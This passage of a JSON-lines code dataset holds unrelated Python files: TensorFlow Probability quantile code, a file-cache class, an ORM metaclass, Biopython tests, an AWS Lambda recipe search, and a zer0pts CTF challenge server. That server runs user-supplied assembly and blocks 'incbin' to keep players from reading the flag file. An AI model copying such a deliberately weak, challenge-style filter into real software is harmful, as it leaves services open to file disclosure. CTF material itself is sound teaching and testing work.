tfp.stats.percentile(x, q=30., interpolation='linear')\n ==> 1.9\n\n # Get 30th and 70th percentiles with 'lower' interpolation\n x = [1., 2., 3., 4.]\n tfp.stats.percentile(x, q=[30., 70.], interpolation='lower')\n ==> [1., 3.]\n\n # Get 100th percentile (maximum). By default, this is computed over every dim\n x = [[1., 2.]\n [3., 4.]]\n tfp.stats.percentile(x, q=100.)\n ==> 4.\n\n # Treat the leading dim as indexing samples, and find the 100th quantile (max)\n # over all such samples.\n x = [[1., 2.]\n [3., 4.]]\n tfp.stats.percentile(x, q=100., axis=[0])\n ==> [3., 4.]\n ```\n\n Compare to `numpy.percentile`.\n\n Args:\n x: Floating point `N-D` `Tensor` with `N > 0`. If `axis` is not `None`,\n `x` must have statically known number of dimensions.\n q: Scalar or vector `Tensor` with values in `[0, 100]`. The percentile(s).\n axis: Optional `0-D` or `1-D` integer `Tensor` with constant values. The\n axis that hold independent samples over which to return the desired\n percentile. If `None` (the default), treat every dimension as a sample\n dimension, returning a scalar.\n interpolation : {'nearest', 'linear', 'lower', 'higher', 'midpoint'}.\n Default value: 'nearest'. This specifies the interpolation method to\n use when the desired quantile lies between two data points `i < j`:\n * linear: i + (j - i) * fraction, where fraction is the fractional part\n of the index surrounded by i and j.\n * lower: `i`.\n * higher: `j`.\n * nearest: `i` or `j`, whichever is nearest.\n * midpoint: (i + j) / 2.\n `linear` and `midpoint` interpolation do not work with integer dtypes.\n keep_dims: Python `bool`. If `True`, the last dimension is kept with size 1\n If `False`, the last dimension is removed from the output shape.\n validate_args: Whether to add runtime checks of argument validity. If\n False, and arguments are incorrect, correct behavior is not guaranteed.\n preserve_gradients: Python `bool`. If `True`, ensure that gradient w.r.t\n the percentile `q` is preserved in the case of linear interpolation.\n If `False`, the gradient will be (incorrectly) zero when `q` corresponds\n to a point in `x`.\n name: A Python string name to give this `Op`. Default is 'percentile'\n\n Returns:\n A `(rank(q) + N - len(axis))` dimensional `Tensor` of same dtype as `x`, or,\n if `axis` is `None`, a `rank(q)` `Tensor`. The first `rank(q)` dimensions\n index quantiles for different values of `q`.\n\n Raises:\n ValueError: If argument 'interpolation' is not an allowed type.\n ValueError: If interpolation type not compatible with `dtype`.\n \"\"\"\n name = name or 'percentile'\n allowed_interpolations = {'linear', 'lower', 'higher', 'nearest', 'midpoint'}\n\n if interpolation is None:\n interpolation = 'nearest'\n else:\n if interpolation not in allowed_interpolations:\n raise ValueError('Argument `interpolation` must be in %s. Found %s' %\n (allowed_interpolations, interpolation))\n\n with tf.name_scope(name, values=[x, q]):\n x = tf.convert_to_tensor(x, name='x')\n\n if interpolation in {'linear', 'midpoint'} and x.dtype.is_integer:\n raise TypeError('{} interpolation not allowed with dtype {}'.format(\n interpolation, x.dtype))\n\n # Double is needed here and below, else we get the wrong index if the array\n # is huge along axis.\n q = tf.cast(q, tf.float64)\n _get_static_ndims(q, expect_ndims_no_more_than=1)\n\n if validate_args:\n q = control_flow_ops.with_dependencies([\n tf.assert_rank_in(q, [0, 1]),\n tf.assert_greater_equal(q, tf.cast(0., tf.float64)),\n tf.assert_less_equal(q, tf.cast(100., tf.float64))\n ], q)\n\n if axis is None:\n y = tf.reshape(x, [-1])\n else:\n axis = tf.convert_to_tensor(axis, name='axis', dtype=tf.int32)\n tf.assert_integer(axis)\n axis_ndims = _get_static_ndims(\n axis, expect_static=True, expect_ndims_no_more_than=1)\n axis_const = tf.contrib.util.constant_value(axis)\n if axis_const is None:\n raise ValueError(\n 'Expected argument `axis` to be statically available. Found: %s' %\n axis)\n axis = axis_const\n if axis_ndims == 0:\n axis = [axis]\n axis = [int(a) for a in axis]\n x_ndims = _get_static_ndims(\n x, expect_static=True, expect_ndims_at_least=1)\n axis = _make_static_axis_non_negative(axis, x_ndims)\n # Move dims in axis to the end, since _sort_tensor, which calls top_k,\n # only sorts the last dim.\n y = _move_dims_to_flat_end(x, axis, x_ndims)\n\n frac_at_q_or_above = 1. - q / 100.\n\n # Sort everything, not just the top 'k' entries, which allows multiple calls\n # to sort only once (under the hood) and use CSE.\n sorted_y = _sort_tensor(y)\n\n d = tf.cast(tf.shape(y)[-1], tf.float64)\n\n def _get_indices(interp_type):\n \"\"\"Get values of y at the indices implied by interp_type.\"\"\"\n # Note `lower` <--> ceiling. Confusing, huh? Due to the fact that\n # _sort_tensor sorts highest to lowest, tf.ceil corresponds to the higher\n # index, but the lower value of y!\n if interp_type == 'lower':\n indices = tf.ceil((d - 1) * frac_at_q_or_above)\n elif interp_type == 'higher':\n indices = tf.floor((d - 1) * frac_at_q_or_above)\n elif interp_type == 'nearest':\n indices = tf.round((d - 1) * frac_at_q_or_above)\n # d - 1 will be distinct from d in int32, but not necessarily double.\n # So clip to avoid out of bounds errors.\n return tf.clip_by_value(\n tf.cast(indices, tf.int32), 0, tf.shape(y)[-1] - 1)\n\n if interpolation in ['nearest', 'lower', 'higher']:\n gathered_y = tf.gather(sorted_y, _get_indices(interpolation), axis=-1)\n elif interpolation == 'midpoint':\n gathered_y = 0.5 * (\n tf.gather(sorted_y, _get_indices('lower'), axis=-1) +\n tf.gather(sorted_y, _get_indices('higher'), axis=-1))\n elif interpolation == 'linear':\n # Copy-paste of docstring on interpolation:\n # linear: i + (j - i) * fraction, where fraction is the fractional part\n # of the index surrounded by i and j.\n larger_y_idx = _get_indices('lower')\n exact_idx = (d - 1) * frac_at_q_or_above\n if preserve_gradients:\n # If q cooresponds to a point in x, we will initially have\n # larger_y_idx == smaller_y_idx.\n # This results in the gradient w.r.t. fraction being zero (recall `q`\n # enters only through `fraction`...and see that things cancel).\n # The fix is to ensure that smaller_y_idx and larger_y_idx are always\n # separated by exactly 1.\n smaller_y_idx = tf.maximum(larger_y_idx - 1, 0)\n larger_y_idx = tf.minimum(smaller_y_idx + 1, tf.shape(y)[-1] - 1)\n fraction = tf.cast(larger_y_idx, tf.float64) - exact_idx\n else:\n smaller_y_idx = _get_indices('higher')\n fraction = tf.ceil((d - 1) * frac_at_q_or_above) - exact_idx\n\n fraction = tf.cast(fraction, y.dtype)\n gathered_y = (\n tf.gather(sorted_y, larger_y_idx, axis=-1) * (1 - fraction) +\n tf.gather(sorted_y, smaller_y_idx, axis=-1) * fraction)\n\n if keep_dims:\n if axis is None:\n ones_vec = tf.ones(\n shape=[_get_best_effort_ndims(x) + _get_best_effort_ndims(q)],\n dtype=tf.int32)\n gathered_y *= tf.ones(ones_vec, dtype=x.dtype)\n else:\n gathered_y = _insert_back_keep_dims(gathered_y, axis)\n\n # If q is a scalar, then result has the right shape.\n # If q is a vector, then result has trailing dim of shape q.shape, which\n # needs to be rotated to dim 0.\n return util.rotate_transpose(gathered_y, tf.rank(q))\n\n\ndef quantiles(x,\n num_quantiles,\n axis=None,\n interpolation=None,\n keep_dims=False,\n validate_args=False,\n name=None):\n \"\"\"Compute quantiles of `x` along `axis`.\n\n The quantiles of a distribution are cut points dividing the range into\n intervals with equal probabilities.\n\n Given a vector `x` of samples, this function estimates the cut points by\n returning `num_quantiles + 1` cut points, `(c0, ..., cn)`, such that, roughly\n speaking, equal number of sample points lie in the `num_quantiles` intervals\n `[c0, c1), [c1, c2), ..., [c_{n-1}, cn]`. That is,\n\n * About `1 / n` fraction of the data lies in `[c_{k-1}, c_k)`, `k = 1, ..., n`\n * About `k / n` fraction of the data lies below `c_k`.\n * `c0` is the sample minimum and `cn` is the maximum.\n\n The exact number of data points in each interval depends on the size of\n `x` (e.g. whether the size is divisible by `n`) and the `interpolation` kwarg.\n\n\n ```python\n # Get quartiles of x with various interpolation choices.\n x = [0., 1., 2., 3., 4., 5., 6., 7., 8., 9., 10.]\n\n tfp.stats.quantiles(x, num_quantiles=4, interpolation='nearest')\n ==> [ 0., 2., 5., 8., 10.]\n\n tfp.stats.quantiles(x, num_quantiles=4, interpolation='linear')\n ==> [ 0. , 2.5, 5. , 7.5, 10. ]\n\n tfp.stats.quantiles(x, num_quantiles=4, interpolation='lower')\n ==> [ 0., 2., 5., 7., 10.]\n\n # Get deciles of columns of an R x C data set.\n data = load_my_columnar_data(...)\n tfp.stats.quantiles(data, num_quantiles=10)\n ==> Shape [11, C] Tensor\n ```\n\n Args:\n x: Floating point `N-D` `Tensor` with `N > 0`. If `axis` is not `None`,\n `x` must have statically known number of dimensions.\n num_quantiles: Scalar `integer` `Tensor`. The number of intervals the\n returned `num_quantiles + 1` cut points divide the range into.\n axis: Optional `0-D` or `1-D` integer `Tensor` with constant values. The\n axis that hold independent samples over which to return the desired\n percentile. If `None` (the default), treat every dimension as a sample\n dimension, returning a scalar.\n interpolation : {'nearest', 'linear', 'lower', 'higher', 'midpoint'}.\n Default value: 'nearest'. This specifies the interpolation method to\n use when the fractions `k / n` lie between two data points `i < j`:\n * linear: i + (j - i) * fraction, where fraction is the fractional part\n of the index surrounded by i and j.\n * lower: `i`.\n * higher: `j`.\n * nearest: `i` or `j`, whichever is nearest.\n * midpoint: (i + j) / 2. `linear` and `midpoint` interpolation do not\n work with integer dtypes.\n keep_dims: Python `bool`. If `True`, the last dimension is kept with size 1\n If `False`, the last dimension is removed from the output shape.\n validate_args: Whether to add runtime checks of argument validity. If\n False, and arguments are incorrect, correct behavior is not guaranteed.\n name: A Python string name to give this `Op`. Default is 'percentile'\n\n Returns:\n cut_points: A `rank(x) + 1 - len(axis)` dimensional `Tensor` with same\n `dtype` as `x` and shape `[num_quantiles + 1, ...]` where the trailing shape\n is that of `x` without the dimensions in `axis` (unless `keep_dims is True`)\n\n Raises:\n ValueError: If argument 'interpolation' is not an allowed type.\n ValueError: If interpolation type not compatible with `dtype`.\n \"\"\"\n with tf.name_scope(name, 'quantiles', values=[x, num_quantiles, axis]):\n x = tf.convert_to_tensor(x, name='x')\n return percentile(\n x,\n q=tf.linspace(\n tf.convert_to_tensor(0, dtype=x.dtype),\n tf.convert_to_tensor(100, dtype=x.dtype),\n num=num_quantiles + 1),\n axis=axis,\n interpolation=interpolation,\n keep_dims=keep_dims,\n validate_args=validate_args,\n preserve_gradients=False)\n\n\ndef _get_static_ndims(x,\n expect_static=False,\n expect_ndims=None,\n expect_ndims_no_more_than=None,\n expect_ndims_at_least=None):\n \"\"\"Get static number of dimensions and assert that some expectations are met.\n\n This function returns the number of dimensions 'ndims' of x, as a Python int.\n\n The optional expect arguments are used to check the ndims of x, but this is\n only done if the static ndims of x is not None.\n\n Args:\n x: A Tensor.\n expect_static: Expect `x` to have statically defined `ndims`.\n expect_ndims: Optional Python integer. If provided, assert that x has\n number of dimensions equal to this.\n expect_ndims_no_more_than: Optional Python integer. If provided, assert\n that x has no more than this many dimensions.\n expect_ndims_at_least: Optional Python integer. If provided, assert that x\n has at least this many dimensions.\n\n Returns:\n ndims: A Python integer.\n\n Raises:\n ValueError: If any of the expectations above are violated.\n \"\"\"\n ndims = x.shape.ndims\n if ndims is None:\n shape_const = tf.contrib.util.constant_value(tf.shape(x))\n if shape_const is not None:\n ndims = shape_const.ndim\n\n if ndims is None:\n if expect_static:\n raise ValueError(\n 'Expected argument `x` to have statically defined `ndims`. Found: ' %\n x)\n return\n\n if expect_ndims is not None:\n ndims_message = ('Expected argument `x` to have ndims %s. Found tensor %s'\n % (expect_ndims, x))\n if ndims != expect_ndims:\n raise ValueError(ndims_message)\n\n if expect_ndims_at_least is not None:\n ndims_at_least_message = (\n 'Expected argument `x` to have ndims >= %d. Found tensor %s' %\n (expect_ndims_at_least, x))\n if ndims < expect_ndims_at_least:\n raise ValueError(ndims_at_least_message)\n\n if expect_ndims_no_more_than is not None:\n ndims_no_more_than_message = (\n 'Expected argument `x` to have ndims <= %d. Found tensor %s' %\n (expect_ndims_no_more_than, x))\n if ndims > expect_ndims_no_more_than:\n raise ValueError(ndims_no_more_than_message)\n\n return ndims\n\n\ndef _get_best_effort_ndims(x,\n expect_ndims=None,\n expect_ndims_at_least=None,\n expect_ndims_no_more_than=None):\n \"\"\"Get static ndims if possible. Fallback on `tf.rank(x)`.\"\"\"\n ndims_static = _get_static_ndims(\n x,\n expect_ndims=expect_ndims,\n expect_ndims_at_least=expect_ndims_at_least,\n expect_ndims_no_more_than=expect_ndims_no_more_than)\n if ndims_static is not None:\n return ndims_static\n return tf.rank(x)\n\n\ndef _insert_back_keep_dims(x, axis):\n \"\"\"Insert the dims in `axis` back as singletons after being removed.\n\n Args:\n x: `Tensor`.\n axis: Python list of integers.\n\n Returns:\n `Tensor` with same values as `x`, but additional singleton dimensions.\n \"\"\"\n for i in sorted(axis):\n x = tf.expand_dims(x, axis=i)\n return x\n\n\ndef _make_static_axis_non_negative(axis, ndims):\n \"\"\"Convert possibly negatively indexed axis to non-negative.\n\n Args:\n axis: Iterable over Python integers.\n ndims: Number of dimensions into which axis indexes.\n\n Returns:\n A list of non-negative Python integers.\n\n Raises:\n ValueError: If values in `axis` are too big/small to index into `ndims`.\n \"\"\"\n non_negative_axis = []\n for d in axis:\n if d >= 0:\n if d >= ndims:\n raise ValueError('dim %d not in the interval [0, %d].' % (d, ndims - 1))\n non_negative_axis.append(d)\n else:\n if d < -1 * ndims:\n raise ValueError(\n 'Negatively indexed dim %d not in the interval [-%d, -1]' % (d,\n ndims))\n non_negative_axis.append(ndims + d)\n return non_negative_axis\n\n\ndef _move_dims_to_flat_end(x, axis, x_ndims):\n \"\"\"Move dims corresponding to `axis` in `x` to the end, then flatten.\n\n Args:\n x: `Tensor` with shape `[B0,B1,...,Bb]`.\n axis: Python list of indices into dimensions of `x`.\n x_ndims: Python integer holding number of dimensions in `x`.\n\n Returns:\n `Tensor` with value from `x` and dims in `axis` moved to end into one single\n dimension.\n \"\"\"\n # Suppose x.shape = [a, b, c, d]\n # Suppose axis = [1, 3]\n\n # front_dims = [0, 2] in example above.\n front_dims = sorted(set(range(x_ndims)).difference(axis))\n # x_permed.shape = [a, c, b, d]\n x_permed = tf.transpose(x, perm=front_dims + list(axis))\n\n if x.shape.is_fully_defined():\n x_shape = x.shape.as_list()\n # front_shape = [a, c], end_shape = [b * d]\n front_shape = [x_shape[i] for i in front_dims]\n end_shape = [np.prod([x_shape[i] for i in axis])]\n full_shape = front_shape + end_shape\n else:\n front_shape = tf.shape(x_permed)[:x_ndims - len(axis)]\n end_shape = [-1]\n full_shape = tf.concat([front_shape, end_shape], axis=0)\n return tf.reshape(x_permed, shape=full_shape)\n\n\ndef _sort_tensor(tensor):\n \"\"\"Use `top_k` to sort a `Tensor` along the last dimension.\"\"\"\n sorted_, _ = tf.nn.top_k(tensor, k=tf.shape(tensor)[-1])\n sorted_.set_shape(tensor.shape)\n return sorted_\n","repo_name":"xlandscape/CmfContinuous-Component","sub_path":"module/bin/python/Lib/site-packages/tensorflow_probability/python/stats/quantiles.py","file_name":"quantiles.py","file_ext":"py","file_size_in_byte":18542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"12734593893","text":"import os.path\nimport shutil\n\nfrom .FilesetInfoAccumulator import FilesetInfoAccumulator\nfrom .FilespecMerger import FilespecMerger\nfrom .PooledFile import listdir\nfrom .util import debug_log, verbose_stderr, warning\n\nclass FilesetCache(object):\n \"\"\"FilesetCache is a base class.\"\"\"\n\n def __init__(self, parent, path, deltadir, ctx, attrs, sel, next):\n self._parent = parent\n self._path = path\n self._deltadir = deltadir\n self._ctx = ctx\n self._attrs = attrs\n self._sel = sel\n self._next = next\n self._fileinfo = None\n self._deletedInfo = FilesetInfoAccumulator(self._attrs)\n\n def __hash__(self):\n \"\"\"For storage in sets.\"\"\"\n return id(self)\n\n def __eq__(self, other):\n \"\"\"For storage in sets.\"\"\"\n return self is other\n\n def _subpath(self, x):\n return os.path.join(self._path, '_' + str(x))\n\n def _subdeltadir(self, x):\n return os.path.join(self._deltadir, '_' + str(x))\n\n def children(self):\n \"\"\"Child filesets are stored with a leading underscore, to leave room for metadata.\"\"\"\n for x in listdir(self._path):\n if x.startswith('_'):\n yield x[1:]\n\n def infopath(self, deleted=False):\n if deleted:\n return os.path.join(self._deltadir, \"deleted.info\")\n else:\n return os.path.join(self._path, \"info\")\n\n def purge(self):\n \"\"\"Purge existing cache on disk, and create empty.\"\"\"\n #debug_log(\"FilesetCache purging %s\\n\" % self._path)\n if os.path.exists(self._path):\n # Purge existing cache.\n # For safety in case of misconfiguration, we only delete directories with a leading underscore\n for x in listdir(self._path):\n px = os.path.join(self._path, x)\n if x.startswith('_'):\n shutil.rmtree(px)\n elif x == 'info':\n os.remove(px)\n else:\n verbose_stderr(\"WARNING: cache purge ignoring %s\\n\" % px)\n else:\n os.makedirs(self._path)\n\n def select(self, filter=None):\n merger = FilespecMerger()\n for f, f1 in self.filtered(filter):\n merger.add(f.select(f1))\n # no yield from in python 2, so:\n for filespec in merger.merge():\n yield filespec\n\n def merge_info(self, acc, filter=None):\n \"\"\"Return whether merged from cache; otherwise caller will have to scan over filespecs.\"\"\"\n #debug_log(\"FilesetCache(%s) merge_info\\n\" % self._path)\n if filter is None:\n #debug_log(\"FilesetCache(%s)::merge_info(None)\\n\" % self._path)\n if self._fileinfo is None:\n #debug_log(\"FilesetCache(%s)::merge_info(None) reading info file\\n\" % self._path)\n infofile = self.infopath()\n deletedInfofile = self.infopath(deleted=True)\n try:\n if os.path.exists(deletedInfofile):\n # if deleted filelist is older than cache, remove it\n if os.stat(deletedInfofile).st_mtime < os.stat(infofile).st_mtime:\n #debug_log(\"removing obsolete deleted infofile %s\\n\" % deletedInfofile)\n os.remove(deletedInfofile)\n else:\n #debug_log(\"reading deleted infofile %s\\n\" % deletedInfofile)\n with open(deletedInfofile, 'r') as f:\n self._deletedInfo = FilesetInfoAccumulator.fromFile(f, self._attrs)\n except IOError:\n warning(\"can't read deleted info %s, ignoring\" % deletedInfofile)\n self._deletedInfo = FilesetInfoAccumulator(self._attrs)\n try:\n with open(infofile, 'r') as f:\n self._fileinfo = FilesetInfoAccumulator.fromFile(f, self._attrs)\n except IOError:\n warning(\"can't read info %s, ignoring\" % infofile)\n\n if self._fileinfo is not None:\n acc.accumulate(self._fileinfo)\n acc.decumulate(self._deletedInfo)\n #debug_log(\"FilesetCache(%s)::merge_info() done\\n\" % self._path)\n return True\n #debug_log(\"FilesetCache(%s)::merge_info() not merged yet\\n\" % self._path)\n\n #debug_log(\"FilesetCache(%s)::merge_info() still here\\n\" % self._path)\n # didn't manage to read infofile, or we need a filtered scan\n if self._next is not None:\n #debug_log(\"FilesetCache(%s)::merge_info() asking children\\n\" % self._path)\n for f, f1 in self.filtered(filter):\n f.merge_info(acc, f1)\n return True\n else:\n #debug_log(\"FilesetCache(%s)::merge_info() baling\\n\" % self._path)\n return False\n\n def add(self, filespec):\n if self._next is not None:\n self.filesetFor(filespec).add(filespec)\n if self._fileinfo is None:\n self._fileinfo = FilesetInfoAccumulator(self._attrs)\n self._fileinfo.add(filespec)\n\n def finalize(self):\n #debug_log(\"FilesetCache::finalize(%s)\\n\" % self._path)\n finalized = False\n if self._next is not None:\n for f, f1 in self.filtered(None):\n f.finalize()\n if not finalized:\n finalized = True\n\n # write info file, only if a child did something\n if self._next is None or finalized:\n with open(self.infopath(), 'w') as infofile:\n if self._fileinfo is not None:\n self._fileinfo.write(infofile)\n\n def delete(self, filespec):\n #debug_log(\"FilesetCache(%s)::delete %s\\n\" % (self._path, filespec.path))\n self._deletedInfo.add(filespec)\n self._ctx.pendingCaches.add(self)\n if self._parent is not None:\n self._parent.delete(filespec)\n\n def saveDeletions(self):\n #debug_log(\"FilesetCache(%s)::saveDeletions\\n\" % self._path)\n try:\n if not os.path.exists(self._deltadir):\n os.makedirs(self._deltadir)\n except IOError:\n warning(\"can't create deltadir %s, ignoring\" % self._deltadir)\n return\n if self._deletedInfo.nFiles > 0:\n deletedInfofile = self.infopath(deleted=True)\n #debug_log(\"FilesetCache(%s)::saveDeletions deletedInfo\\n\" % self._path)\n try:\n with open(deletedInfofile, 'w') as f:\n self._deletedInfo.write(f)\n except IOError:\n warning(\"can't write deleted info %s, ignoring\" % deletedInfofile)\n self._deletedInfo = FilesetInfoAccumulator(self._attrs)\n","repo_name":"tesujimath/filebutler","sub_path":"filebutler/FilesetCache.py","file_name":"FilesetCache.py","file_ext":"py","file_size_in_byte":6803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"38269483342","text":"import os\nimport random\nimport string\nimport subprocess\n\ndef randstr(l):\n return ''.join([random.choice(string.ascii_letters) for i in range(l)])\n\ndef check(code):\n if len(code) > 0x1000:\n print(\"[-] Too large\")\n return False\n if 'incbin' in code:\n print(\"[-] You can't guess the filename of the flag\")\n return False\n if '%' in code:\n print(\"[-] Macro is disabled just in case\")\n return False\n return True\n\nif __name__ == '__main__':\n print(\"* Paste your assembly code to emulate ('EOF' to end)\")\n\n # read code\n code = 'BITS 64\\n'\n code += 'ORG 0\\n'\n while True:\n line = input()\n if line == 'EOF':\n break\n code += line + '\\n'\n\n # check code\n if not check(code):\n exit(1)\n\n # save to file\n name = \"/tmp/\" + randstr(32)\n with open(f\"{name}.S\", \"w\") as f:\n f.write(code)\n\n # assemble\n p = subprocess.Popen([\"/usr/bin/nasm\",\n \"-fbin\", f\"{name}.S\",\n \"-o\", f\"{name}.bin\"])\n if p.wait(timeout=1) != 0:\n print(\"[-] Assemble failed\")\n exit(1)\n\n os.remove(f\"{name}.S\")\n\n # emulate\n try:\n pid = os.fork()\n if pid == 0:\n os.execl(\"./x64-emulator\", \"./x64-emulator\", f\"{name}.bin\")\n os._exit(0)\n else:\n os.waitpid(pid, 0)\n except Exception as e:\n print(e)\n finally:\n os.remove(f\"{name}.bin\")\n","repo_name":"sajjadium/ctf-archives","sub_path":"ctfs/zer0pts/2021/pwn/nasm_kit/bin/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":490,"dataset":"github-code","pt":"77"} +{"seq_id":"5415052671","text":"from ikea.fields import BaseColumn\nfrom collections import OrderedDict\n\n\nclass Metabase(type):\n\n def __new__(cls, name, bases, clsdict):\n fields = OrderedDict()\n clsobj = super().__new__(cls, name, bases, clsdict)\n\n if not hasattr(clsobj, '__tablename__'):\n raise AttributeError(\"Models must have a __tablename__!\")\n\n if not hasattr(clsobj, '_registry'):\n clsobj._registry = set()\n else:\n clsobj._registry.add(clsobj)\n\n for attr, value in clsdict.items():\n if isinstance(value, BaseColumn):\n fields[attr] = value\n\n for attr, _ in fields.items():\n clsdict.pop(attr)\n\n setattr(clsobj, 'fields', fields)\n\n return clsobj\n\n\ndef main():\n pass\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Nimor111/101-v5","sub_path":"week13/HomemadeORM/ikea/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71740815290","text":"import random\nrandlist = \"1234567890qwertyuiopasdfghjklzxcvbnm-*/+.,?[]}{_\\=''\"\ndef my_fun(n):\n my_list = []\n for i in range (1, n):\n x = random.choice(randlist)\n my_list.append (x)\n print (my_list)\nn = int (input())\nmy_fun(n)","repo_name":"Malika939/Funkzii2","sub_path":"Problem11.py","file_name":"Problem11.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"31863391028","text":"import copy\nimport unittest\nimport warnings\n\ntry:\n import numpy\n from numpy import linalg # missing in PyPy's micronumpy\nexcept ImportError:\n from Bio import MissingExternalDependencyError\n\n raise MissingExternalDependencyError(\n \"Install NumPy if you want to use Bio.LogisticRegression.\"\n ) from None\n\nfrom Bio import BiopythonDeprecationWarning\n\nwith warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", category=BiopythonDeprecationWarning)\n from Bio import LogisticRegression\n\n\nxs = [\n [-53, -200.78],\n [117, -267.14],\n [57, -163.47],\n [16, -190.30],\n [11, -220.94],\n [85, -193.94],\n [16, -182.71],\n [15, -180.41],\n [-26, -181.73],\n [58, -259.87],\n [126, -414.53],\n [191, -249.57],\n [113, -265.28],\n [145, -312.99],\n [154, -213.83],\n [147, -380.85],\n [93, -291.13],\n]\n\nys = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0]\n\n\ndef show_progress(iteration, loglikelihood):\n \"\"\"No action callback function, used when training the model.\"\"\"\n pass\n\n\nclass TestLogisticRegression(unittest.TestCase):\n def test_xs_and_ys_input_parameter_lengths(self):\n modified_xs = copy.copy(xs)\n modified_xs.pop()\n self.assertRaises(ValueError, LogisticRegression.train, modified_xs, ys)\n\n def test_ys_input_class_assignments(self):\n modified_ys = copy.copy(ys)\n modified_ys.pop()\n modified_ys.append(2)\n self.assertRaises(ValueError, LogisticRegression.train, xs, modified_ys)\n\n def test_dimensionality_of_input_xs(self):\n modified_xs = copy.copy(xs)\n modified_xs[0] = []\n self.assertRaises(ValueError, LogisticRegression.train, modified_xs, ys)\n\n def test_calculate_model(self):\n model = LogisticRegression.train(xs, ys)\n beta = model.beta\n self.assertAlmostEqual(beta[0], 8.9830, places=4)\n self.assertAlmostEqual(beta[1], -0.0360, places=4)\n self.assertAlmostEqual(beta[2], 0.0218, places=4)\n\n def test_calculate_model_with_update_callback(self):\n model = LogisticRegression.train(xs, ys, update_fn=show_progress)\n beta = model.beta\n self.assertAlmostEqual(beta[0], 8.9830, places=4)\n\n def test_classify(self):\n model = LogisticRegression.train(xs, ys)\n result = LogisticRegression.classify(model, [6, -173.143442352])\n self.assertEqual(result, 1)\n result = LogisticRegression.classify(model, [309, -271.005880394])\n self.assertEqual(result, 0)\n\n def test_calculate_probability(self):\n model = LogisticRegression.train(xs, ys)\n q, p = LogisticRegression.calculate(model, [6, -173.143442352])\n self.assertAlmostEqual(p, 0.993242, places=6)\n self.assertAlmostEqual(q, 0.006758, places=6)\n q, p = LogisticRegression.calculate(model, [309, -271.005880394])\n self.assertAlmostEqual(p, 0.000321, places=6)\n self.assertAlmostEqual(q, 0.999679, places=6)\n\n def test_model_accuracy(self):\n correct = 0\n model = LogisticRegression.train(xs, ys)\n predictions = [1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0]\n for i in range(len(predictions)):\n prediction = LogisticRegression.classify(model, xs[i])\n self.assertEqual(prediction, predictions[i])\n if prediction == ys[i]:\n correct += 1\n self.assertEqual(correct, 16)\n\n def test_leave_one_out(self):\n correct = 0\n predictions = [1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0]\n for i in range(len(predictions)):\n model = LogisticRegression.train(xs[:i] + xs[i + 1 :], ys[:i] + ys[i + 1 :])\n prediction = LogisticRegression.classify(model, xs[i])\n self.assertEqual(prediction, predictions[i])\n if prediction == ys[i]:\n correct += 1\n self.assertEqual(correct, 15)\n\n\nif __name__ == \"__main__\":\n runner = unittest.TextTestRunner(verbosity=2)\n unittest.main(testRunner=runner)\n","repo_name":"biopython/biopython","sub_path":"Tests/test_LogisticRegression.py","file_name":"test_LogisticRegression.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","stars":3852,"dataset":"github-code","pt":"77"} +{"seq_id":"71627019770","text":"import json\nimport boto3\nimport datetime\nfrom requests_aws4auth import AWS4Auth\nimport requests\nfrom boto3.dynamodb.conditions import Key, Attr\nfrom pprint import pprint\n\n\ndef lambda_handler(event, context):\n ingredients = event[\"ingredients\"]\n search_time = event[\"search_time\"]\n picture_url = event[\"picture_url\"]\n user_id = event[\"user_id\"]\n\n dynamodb = boto3.resource('dynamodb', region_name='us-east-1',\n aws_secret_access_key=\"*\",\n aws_access_key_id=\"*\")\n recipe_table = dynamodb.Table(\"recipe\")\n visitors_table = dynamodb.Table(\"user\")\n\n host = '*'\n region = 'us-east-1'\n service = 'es'\n access_access_key_id = \"*\"\n access_secrect_access_key = \"*\"\n awsauth = AWS4Auth(access_access_key_id, access_secrect_access_key, region, service)\n\n # fuzzy search setting:\n # fuzziness: allow up to 2 characters to change\n # fuzzy_max_expansions: expand up to 50 characters for fuzzy matches\n # fuzzy_prefix_length: 1 character at the beginning of terms should not be changed for fuzzy matches\n json_q = json.dumps({\n \"query\": {\n \"query_string\": {\n \"query\": \" \".join(ingredients),\n \"fuzziness\": 2,\n \"default_operator\": \"OR\",\n \"fuzzy_max_expansions\": 50,\n \"fuzzy_prefix_length\": 1,\n },\n },\n \"size\": 20\n })\n\n headers = {'Content-Type': 'application/json'}\n r = requests.get(host + \"/\" + \"recipes\" + \"/_search\", auth=awsauth, data=json_q, headers=headers)\n res = json.loads(r.text)\n\n reply = \"\"\n for i in range(len(res[\"hits\"][\"hits\"])):\n try:\n recipe_id = res[\"hits\"][\"hits\"][i][\"_id\"]\n response = recipe_table.query(KeyConditionExpression=Key(\"recipe_id\").eq(recipe_id))\n reply = json.dumps({\n \"recipe_id\": recipe_id,\n \"minutes\": str(response[\"Items\"][0][\"minutes\"]),\n \"name\": response[\"Items\"][0][\"name\"],\n \"tags\": response[\"Items\"][0][\"tags\"],\n })\n except Exception as e:\n print(e)\n\n new_history = {\n 'picture_url': picture_url,\n 'search_time': search_time,\n 'query': ' '.join(ingredients)\n }\n response = visitors_table.get_item(Key={\"user_id\": user_id})\n user = (response[\"Item\"] if \"Item\" in response else None)\n if user == None:\n item = {\"user_id\": user_id, }\n response = visitors_table.put_item(Item=item)\n response = visitors_table.get_item(Key={\"user_id\": user_id})\n user = (response[\"Item\"] if \"Item\" in response else None)\n\n query_history = user[\"query_history\"] if \"query_history\" in user else []\n query_history.append(new_history)\n query_history_len = len(query_history)\n if query_history_len > 10:\n query_history = query_history[query_history_len - 10:]\n\n response = 